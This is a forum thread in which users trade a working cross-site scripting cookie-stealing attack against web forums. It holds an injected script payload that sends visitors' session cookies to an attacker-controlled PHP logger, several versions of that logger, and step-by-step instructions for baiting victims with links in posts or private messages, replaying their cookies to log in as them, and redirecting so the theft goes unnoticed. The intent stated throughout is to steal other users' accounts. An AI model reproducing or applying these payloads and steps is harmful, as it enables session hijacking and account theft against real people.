0
m93's Avatar, Join Date: Nov 2009
m93
Go4Expert Member
tnx.it waz very useful

i have some questions.
if i give the users cookies. can i manage that cooki(for refresh) except firefox)for example oper.manage cookies in opera is easy) and i must edit sid yes? tnx
(i inserted the link in phpbb forum. when the users clcik on that their cookie save in log.txt? and for refresh their cookies i dont nedd the usernames?

tnx
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php
Quote:
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookies.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.


I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?
0
m93's Avatar, Join Date: Nov 2009
m93
Go4Expert Member
Quote:
Originally Posted by Toddie View Post
I am testing a xss vulnerability but your script does not work.
your script redirects but does not log cookies.

I am using this script right now and it works fine.

xss injection<script>document.location='url/cookiestealer.php?cookie='+escape(document.cookie) </script>

when i use this injection code cookies are logged into cookies.txt via this script

cookiestealer.php


This works fine but it does not redirect to a new page. I tried adding redirect code to the injected code and also to the .php file itself and there has been no success. Tampering with the code tends to redirect the page before the logging function executes, or does not redirect the page at all, or both.


I tried your script and it does not work.
why does your script not log cookies? where is the error? If you can't answer that question then here is another question.

what do I need to do to get my script able to redirect to another page after it executes?
i downloaded the scriptsthis topic. script doesnt have problem? plz explain if i want steal users cookie (in forums) what should i do? (step by step) tnx a lot
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
now this is instructions for my script.
you need to use cookiestealer.php from my post.
you can add h t t p : / / w w w . before the sites name yourself because it will not allow me to post them with this because it gives me an error saying I have too many live links in my post. (take out the spaces)

step 1: find an injection point. i assume you have already done all of this.
for me i found this url because i could not find a place to inject it into a page.
site.com/forums/search.php?query=123456

step 2:
i then erase 123456 and add "> for my injection.

then I add the code I want it to do.

<script>alert(document.cookie);</script>

here is the finished url. if it works, then you will get a popup box that gives you your cookie.

site.com/forums/search.php?query="><script>alert(document.cookie); </script>

step 3: you need to add files to your own server.
for me the files were cookiestealer.php and cookie.txt.
you can find cookiestealer.php in my post and you can create cookie.txt
cookie.txt is an empty .txt file.

step 4:
then you post this link or send it in pm and get people to click it
site.com/forums/search.php?query="><script>document.location='MYsi te.com/cookiestealer.php?cookie='+escape(document.cookie) </script>

now when someone clicks that link their cookie will be saved in cookie.txt on your server.
you just edit the cookie with firebug or whatever you use so that the info in the cookie is replaced with the victims cookie.

step 5:
refresh the page you are on at the site and you should be logged in as that user without needing to enter user name or password or anything.

*if you are trying to steal the cookies of an admin you should know that most administrator control panels force you to re-enter your password to access the administrator control panel so cookies will not allow you to access this. you can usually moderate the forums without any password prompt though. but of course as soon as they see this they will fix whatever you did.

__________________________________________________ _________________________________

now if someone could kindly tell me how to redirect this cookiestealer.php page to another webpage?
otherwise its obvious to the victim that they just got their cookie stolen!

anyone?

this should be simple code but I guess I just don't understand the ins and outs of the code.
I tried a few different ways to redirect the page but none are working. I understand what I need to add for code and I am able to make the page redirect under normal circumstances, but the problem is that the code conflicts with the other code I have and either renders it unworkable or simply redirects the page without allowing the code to execute. I am sure its a simple syntax error or placement of the code for an experienced user it would be easy to find. like I said i tried to redirect in the url itself and in the cookiestealer.php file but I cannot get it to function correctly.

here is one example I tried to add to the file but it does not work.
echo '<script type="text/javascript">setTimeout("location.href=\'newsite.co m\'",1*1000)</script>';

please help with this.
0
farnoise's Avatar, Join Date: Jan 2010
Newbie Member
Just great,
Really straight forward, The only problem that I'm having is its not send me the COOKIE I have everything else but not the cookie.
Here is a sample line of my log file


IP: 24.132.23.14 | PORT: 52020 | HOST: | Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.31318; .NET CLR 3.5.30729) | METHOD: | REF: facebook.com | DATE: Wednesday 13th 2010f January 2010 06:48:06 PM | COOKIE:



I'd appreciate any help and thanks again
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
yeah i already made a comment that the script does not work. I do not know why perhaps it is outdated and only used for older browsers.

at least it prints information for you. for me the file remained blank and nothing was printed.

the script I provided is very simple and works. it gives you the cookie and nothing else... which is all you really need anyways.

I am still waiting for someone to take a look at my script and figure out how to make it redirect to a new page while retaining the functionality of the script itself.

I have a feeling I should not hold my breath.
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
This shud help

PHP Code:
 <?php
$cookie 
$_GET['c'];
$ip getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp fopen('cookies.html''a');
fwrite($fp'Cookie: '.$cookie.'<br> IP: ' .$ip'<br> Date and Time: ' .$date'<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://www.yourhost.com");
?>
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
That did not work.

What that did is write all information EXCEPT the cookie. and also it did not redirect the page.
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
it works fine. There shud be something tricky on the site that ur trying it. whats the scripting ur using to steal the cookies?
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
I am not able to inject the code into the site. I am Injecting it into a search query.
The "victim" must click on the link either in a post or a pm that I send them.

Here is an example of the link.
I changed the site name for confidentiality purposes of course.

h t t p : / / w w w .victimsite.com/forums/search.php?query="><script>document.location='h t t p : / / w w w.mysite.com/cookiestealer.php?cookie='+escape(document.cookie) </script>

when I use your script with that link, it displays the info except for the cookie and also it does not redirect.

the script I mention in my first post does work, and i really only need the cookie not all the other info but I would like to get it to redirect which it currently does not.

Also i might note that I tried putting a redirect in the url itself but then the cookiestealer.php does not do anything at all and it simply redirects without logging anything.

if you would like to test it out on your own test server or some free site then I can pm you more details about what the site is that I am doing this on.